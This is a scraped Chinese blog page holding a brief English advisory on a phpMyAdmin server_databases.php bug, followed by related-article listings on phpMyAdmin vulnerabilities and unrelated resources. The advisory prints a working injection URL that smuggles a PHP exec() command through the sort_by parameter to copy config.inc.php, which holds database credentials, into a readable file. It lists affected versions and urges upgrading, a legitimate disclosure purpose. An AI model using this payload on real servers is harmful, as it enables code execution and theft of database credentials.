Phpmyadmin‘s server_databases.php bug

最新推荐文章于 2024-06-20 20:40:05 发布
原创 最新推荐文章于 2024-06-20 20:40:05 发布 · 394 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#phpmyadmin #server #token

本文披露了一个影响多个phpMyAdmin版本的安全漏洞,攻击者可能通过特定请求获取敏感信息。受影响版本包括2.11.9及更早版本。建议用户尽快升级到最新版本以避免潜在风险。

Phpmyadmin‘s server_databases.php bug

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by=”])
OR exec(‘cp $(pwd)”/config.inc.php” config.txt’); //&sort_order=desc&token=[valid token]
some one may attact u by this method.
These phpmyadmin version will be influenced:
phpMyAdmin 2.11.9
phpMyAdmin 2.11.8
phpMyAdmin 2.11.7
phpMyAdmin 2.11.5 1
phpMyAdmin 2.11.5
phpMyAdmin 2.11.4
phpMyAdmin 2.11.1
phpMyAdmin 2.9.1
phpMyAdmin 2.9.2-rc1
phpMyAdmin 2.9.1.1
phpMyAdmin 2.11.8.1
phpMyAdmin 2.11.5.2
phpMyAdmin 2.11.2.2
phpMyAdmin 2.11.2.1
phpMyAdmin 2.11.1.2
phpMyAdmin 2.11.1.1
phpMyAdmin 2.10.0.2
phpMyAdmin 2.10.0.1
phpMyAdmin 2.10.0.1
So to deal with this you’d better update your phpmyadmin to 

above 2.11.9.
unmark php,server_databases.php
weixin_34439450的博客
03-31 156
/* vim: set expandtab sw=4 ts=4 sts=4: *//**** @package PhpMyAdmin*//*** Does the common work*/require_once './libraries/common.inc.php';require './libraries/server_common.inc.php';if (!PMA_DRIZZLE) {...
phpMyAdmin
梦想的天空
08-10 2422
<br />phpMyAdmin 是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库。通过 phpMyAdmin 可以完全对数据库进行操作,例如建立、复制、删除数据等等。 <br />如果使用合适的工具,MySQL 数据库的管理就会为得相当简单。应用 MySQL 命令行方式需要对 MySQL 知识非常熟悉,对 SQL语言也是同样的道理。不仅如此,如果数据库的访问量很大,列表中数据的读取就会相当困难。<br />当前出现很多 GUI MySQL 客户程序,其中最为出色的是基于 Web
解决phpmyadmin 遇见的问题
asdfgh0077的博客
08-06 113
解决phpmyadmin 遇见的问题
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 735
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
phpmyadmin4.8.1漏洞复现-远程文件包含
weixin_54555816的博客
04-10 4783
phpMyAdmin4.8.0 - 4.8.1版本均受漏洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
mysql 1932,MySQL错误-#1932-引擎中不存在表'phpmyadmin.pma user config'
weixin_39782500的博客
01-19 1043
I am trying to set up my database in MySQL using XAMPP. I am doing this via phpMyAdmin on localhost(Apache is running). The only action on my part is typing in a new, unused, name for a database, clic...
CentOS6.5+apache+mysql+php+Ruby+Redmine+phpMyAdmin+BugFree
Coder.Monkey的工作簿
03-17 2974
一.安装版本说明 CentOS:   6.5-x86_64 Apache:   2.4.9 PHP:          5.5.6 Ruby: 2.1.5 Redmine: 2.5.2 Mysql: 5.6.16   二.安装CentOS_6.5-x86_64 1.      系统安装流程 界面1选择基本存储设备 界面2选择全新安装 界面3主机名:localhost,同时左
bugfree 修改mysql 配置信息_bugfree安装与配置
weixin_39840733的博客
01-26 311
配置环境OS:win7 32位xampp 版本:xampp-win32-1.7.4bugfree版本:v2.1.3xampp简介xampp是一款跨平台的集成 apache + mysql + php环境,是的配置AMP服务器变得简单轻松,支持windows,solaris,MacOSX,linux。本文以win7 32位系统为例software 准备在www.duote.com上分别下载xampp...
高级PHP应用程序漏洞审核技术
u011500307的专栏
06-12 981
高级PHP应用程序漏洞审核技术 前言传统的代码审计技术PHP版本与应用代码审计其他的因素与应用代码审计扩展我们的字典 变量本身的key变量覆盖 遍历初始化变量parse_str()变量覆盖漏洞import_request_variables()变量覆盖漏洞PHP5 Globals magic_quotes_gpc与代码安全 什么是magic_quotes_gpc哪些地方没
LNMP的平台搭建及源码编译
Logbook的博客
08-05 1085
mysql的源码编译 [root@server6 ~]# ls cmake-2.8.12.2-4.el6.x86_64.rpm mysql-boost-5.7.17.tar.gz [root@server6 ~]# tar zxf mysql-boost-5.7.17.tar.gz [root@server6 ~]# ls cmake-2.8.12.2-4.el6.x86_64.rpm ...
精选资源
mysql笔记.doc
01-09
例如,MySQL不支持全连接(Full Join),也没有SQL Server中的“TOP N”用法。 选择MySQL作为学习对象的原因主要是因为其与Linux、PHP、Apache紧密结合,形成了LAMP架构,这是Web开发中常见的基础组件。此外,MySQL...
缺陷管理系统mantisbt-2.26.2安装手册
weixin_42520723的博客
06-20 1726
mantis安装
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
热门推荐
weixin_46022776的博客
06-04 2万+
问题:解决:日志功能未开启,OFF,执行sql开启ON。
遥感监测基于SAR数据的洪水变化检测:Sentinel-1影像阈值分割与多时相合成分析
12-02
内容概要:本文介绍了一项基于SAR(合成开口雷达)数据的洪水变化检测实践任务,重点在于利用Sentinel-1 GRD数据进行灾后监测。文中详细讲解了从数据获取、过滤、合成到变化检测与可视化展示的完整流程。由于SAR数据不受云层和昼夜影响,特别适用于灾害应急响应。通过对比洪水前后两个时间段的SAR影像,采用中值合成去噪、比值法计算变化指数,并通过阈值分割生成二值化的洪涝淹没图,最终在Folium地图中实现叠加可视化。; 适合人群:具备遥感基础知识和Python编程能力,熟悉Google Earth Engine平台操作的科研人员或高年级本科生、研究生;对灾害监测、环境变化分析感兴趣的技术人员;; 使用场景及目标:①掌握SAR数据在洪水等自然灾害监测中的应用方法;②学习如何在Earth Engine中处理Sentinel-1数据并实现变化检测;③构建完整的遥感变化检测分析流程,包括数据预处理、影像合成、阈值分割与结果可视化; 阅读建议:建议读者结合代码实例逐步实践,重点关注filterDate、median合成、divide运算和lt阈值处理等关键步骤的操作逻辑,并注意地理坐标顺序、图层叠加方式等细节问题,确保分析结果准确可靠。
基于Web与物联网的分布式智慧农业环境监测系统源码实现
最新发布
12-02
**项目资料:基于网络与物联网架构的分布式农业环境远程监控系统源代码** 本资料包提供了一套完整的分布式农业环境远程监控系统实现方案,该系统融合了现代网络技术与物联网架构,能够实现对农业生产环境的远程、实时、多节点监测与管理。系统源代码经过全面测试,各项功能运行稳定可靠,可供直接部署或二次开发使用。 该资料适用于计算机科学与技术、人工智能、通信工程、自动化、电子信息工程等相关专业的高校师生、科研人员以及行业技术人员参考学习与实践。对于希望深入理解物联网应用开发、分布式系统设计或智慧农业解决方案的学习者而言,本资料具有较高的参考价值。同时,其完整的项目结构也适用于毕业设计、课程设计、项目实践或作为特定功能模块的开发基础。 使用者可根据自身需求,在现有代码框架上进行功能扩展、算法优化或与其他系统进行集成。我们鼓励基于此代码进行合法的学习、研究与创新应用,并通过技术交流共同促进相关领域的技术发展。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
在AI+时代,地方政府如何利用数字化升级路径重构市场占有率?.docx
12-02
在AI+时代,地方政府如何利用数字化升级路径重构市场占有率?
对比传统方案,新一代技术转移SaaS系统如何为科研院所带来颠覆性变革?.docx
12-02
对比传统方案,新一代技术转移SaaS系统如何为科研院所带来颠覆性变革?
如何通过智能化转型方案重塑服务效率与质量,从而重塑开拓全新增长点?.docx
12-02
如何通过智能化转型方案重塑服务效率与质量,从而重塑开拓全新增长点?
解决PHP 5.3.3版本加载php_memcache.dll问题
其版本2.1a与x32位系统兼容,与文中提到的php5.3.3、Mysql 5.5.8、Apache 2.2.17以及PHPMyAdmin 3.2.0.1配合使用,构成了一套完整的本地Web开发解决方案。值得注意的是,还提到了对旧版本的替换,去除了sqlitemanage...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值